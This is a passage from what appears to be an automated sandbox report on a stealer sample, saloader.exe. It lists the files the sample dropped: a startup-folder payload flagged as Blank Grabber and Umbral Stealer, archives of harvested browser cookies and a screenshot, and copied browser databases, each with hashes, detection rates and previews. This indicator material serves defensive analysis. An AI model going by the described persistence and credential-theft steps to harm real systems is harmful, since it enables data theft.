                                                                                        file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                        • 162.159.129.233
                                                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 162.159.129.233
                                                                                        stub.exeGet hashmaliciousStealeriumBrowse
                                                                                        • 162.159.129.233

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):235008
                                                                                        Entropy (8bit):6.050139535659894
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:lloZMQfsXtioRkts/cnnK6cMldKRn/1+mpnsl3ySXCkb8e1muhi:noZItlRk83MldKRn/1+mpnsl3ySXze
                                                                                        MD5:1E10AF7811808FC24065F18535CF1220
                                                                                        SHA1:65995BCB862AA66988E1BB0DBFF75DCAC9B400C7
                                                                                        SHA-256:E07FD0AC793B06603BE164C9EE73465AF512CF17BED07614CBCD2A8410F04EED
                                                                                        SHA-512:F1C623918A3701254805E7648D671B316446A0F98637D3DE62D44331CF91502AFB57CCB762472491BC4AC037FBF5F7B624EB9D39092B3BE0B2ED84DA6F3ACADC
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, Author: Joe Security
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                        • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................L...O.......P...........................0................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                                                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\saloader.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):1965
                                                                                        Entropy (8bit):5.377802142292312
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                        MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                        SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                        SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                        SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................

                                                                                        C:\Users\user\AppData\Local\Temp\9vfZ0GMUz2LnbwL.ligma

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):655149
                                                                                        Entropy (8bit):7.998085670924382
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:Muw0pD+akiaWVbvfhh7f3DWfRZGmlH7vvVVuC/llsQBHsXh0FjCUAJGbeznz:/WakybvZ1rWHGuv3llPBMXh8jCUAgbe3
                                                                                        MD5:4B293D7EAD641D53CF87E4DBBFDD25CD
                                                                                        SHA1:1C58FB49749488437FA417B3BF906CE154246589
                                                                                        SHA-256:B3929DC65BB773A43AA115D93B0312FBC864AA955ACAD842BD27EE32C937A54D
                                                                                        SHA-512:0B68F070B5C05FB80799D33CEEEF24D5CFB7FCFD51E4562F4C7E1A46BB6FDA66AB7CF2C6DD27A260D59BEDBFB849A6D80166E5086DDE3F0B6168025745208548
                                                                                        Malicious:false
                                                                                        Preview:PK.........}Y.\"n....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..D.]P...D.P.8T............i.:......I.o.P._:@....e.0*o....z@..... . [....B..D.....8......N.t.2....\j.8...5T_.h?$m(........?^..O.U..~NEu.>..4&.6HY.L~.....H..^?.P..1....|..i.v..|9.5.J^..*....K.q...9*....!.].Z.....R._PK.........}Y....&...zG......Display\Display.pngl{y8.k..3cd..Ba.K.pT......,Y..t...3.)Dv.0..c'..,c.....Xb.f0....9.....z.x.k...\s...,..W.M...g9..8mjbp..X.o!........\@.[...a....~.....{.[9...#........)....w..z.....^.....$T.Y.....n.l.z..'.`./.si.`{C..{..92R `...E..E.%r.0%.....%...<.h.+p..UW.v..@.wj.sX%R..3.~.w.-.zl.x..~?..[.....v.4..D..*^yG..D:.....N.|.j....tpV.u5.o......Y.u.}9....j.=A-_1..q..)C..pD..OC..._o$y.....H^...]H|x..P.r..\.E=...Z.9:....z...Db>...j.......s.......K..].....zK.....w.....C+?]..~6.*Y..g{-.<..,Sk"Y.1..S....w.J...y..'_.1.^..6H.7h.&.....+c|........).n.}..U..~.Oz..b.......L.]..&Zg.q..`.%.).0..5*^.!.1a.{......~..-FA1U.z.;.!.........0+...-.

                                                                                        C:\Users\user\AppData\Local\Temp\9vfZ0GMUz2LnbwL\Browsers\Cookies\Chrome Cookies.txt

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.865375252169314
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Pk3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:c7JH+74xva3UhyL/8ObW0
                                                                                        MD5:49EC633D95953041A44FF47D64F82A19
                                                                                        SHA1:EA9BD5B1F902BBFC4EC24A7AC5E99EF72436A2F4
                                                                                        SHA-256:3E64F1CCD635E18E72EF1A8F74640450AA7F2EC52529F28C03F473ECC5988A8F
                                                                                        SHA-512:D6A627F441FA70A81F8D3BDBFA63DA0F111FE83EC359321EC281C7D1569382A303091693625AB3B78B1EA2FB9068DCFFAE61F13FA24C6106B1F5183442FB4DF9
                                                                                        Malicious:false
                                                                                        Preview:.google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..

                                                                                        C:\Users\user\AppData\Local\Temp\9vfZ0GMUz2LnbwL\Display\Display.png

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):673658
                                                                                        Entropy (8bit):7.924583955574468
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:yKnJewDFXzRkdBLWN+S6gi3OYTc8iuSonCoLXb/MTNipTaBDVKx86lsD:yKnIm8ZWvVYTyulTX7MTWTah0qQk
                                                                                        MD5:14AB1A1DD4C4C47DFC412C8CD4A030B4
                                                                                        SHA1:19E95D1566E6714E5DF4BDE77B761D8BADCA2930
                                                                                        SHA-256:11D2CBDC08912CC95D395B0E721ED1441DF5760CDC98220985BA52543D694306
                                                                                        SHA-512:005642EE9BEDD42FE3B13BD24DC4A787836E353A6FC84B115498E8F54E030E0C66A9A89C03478DFB05FBD5C2E9C5279D5B943D17489D633032BBA2E887D5EE99
                                                                                        Malicious:false
                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g.mWu....O....Z...We....^.{....(c.MR......D....6.a...I...F&.!@('.Y..Q..18`.7.1.v_c...^{.s$`..6.....G.....s4..G.r....?..;..2./g...u..v.0zM...l..o....;..{....Yi...L....W.2~.w..}....2..E..|k...o....r......K.u@..w..Xy.|{....s...3~......o..cl.........3..oLX.".?...Xy.../...R...W.b.a..[...._....v+O....O.e.+O......\...;....+O...<...b....>.!V..9...\v4...gz.S..v$.<..m..>3a.#..Q.{.q.......<.S....Yy.'. ..a...5...k..{.d.Z.zG`...X.....A.XC.G.....pC...v...5.x......PGbqn...;.v.:a....F./.}].../..%...qV..K........a|.k+.W.n..{..w..*g.yM..~WW.....bn.Y....3..v..Q..qz....VN....rU7..uN|...w+1.B=.3.....=e.E..1..G'_^s.w.s.....1.R>...8..U.S...w..N..2>..Il...u{N+.y.e.}..>.../..'|..;N*...UVN........a.)..8:.#.n.}...O..B..H......?...>VG..v.X.?..y.G+....'...%_p.r.+;..HYSS.......u.V.-..S>..t+G}..w.W.o....K'..c...-.9x.{...[..SrG..et..Rw..#..91.8y ....;/.X.|t....

                                                                                        C:\Users\user\AppData\Local\Temp\KlGFZy9pxbPzA5I

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31wu2kur.ffj.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43ofonih.ciw.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnmqpoik.pa2.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpvdu1zl.tue.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iewcjnef.ecw.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpj3ssjv.51d.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldj2gsng.5lw.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_np0i2da0.ta4.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onybxdop.1ta.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlpl3cba.jje.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upooyqfm.aay.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4r3cph.otn.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\dRdv0DAXQhVZ57n

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.6732424250451717
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\eWNRtPVIqbA91oh

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):51200
                                                                                        Entropy (8bit):0.8746135976761988
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\sZ6Hn3DPlw2gTXC

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.848598812124929
                                                                                        Encrypted:false
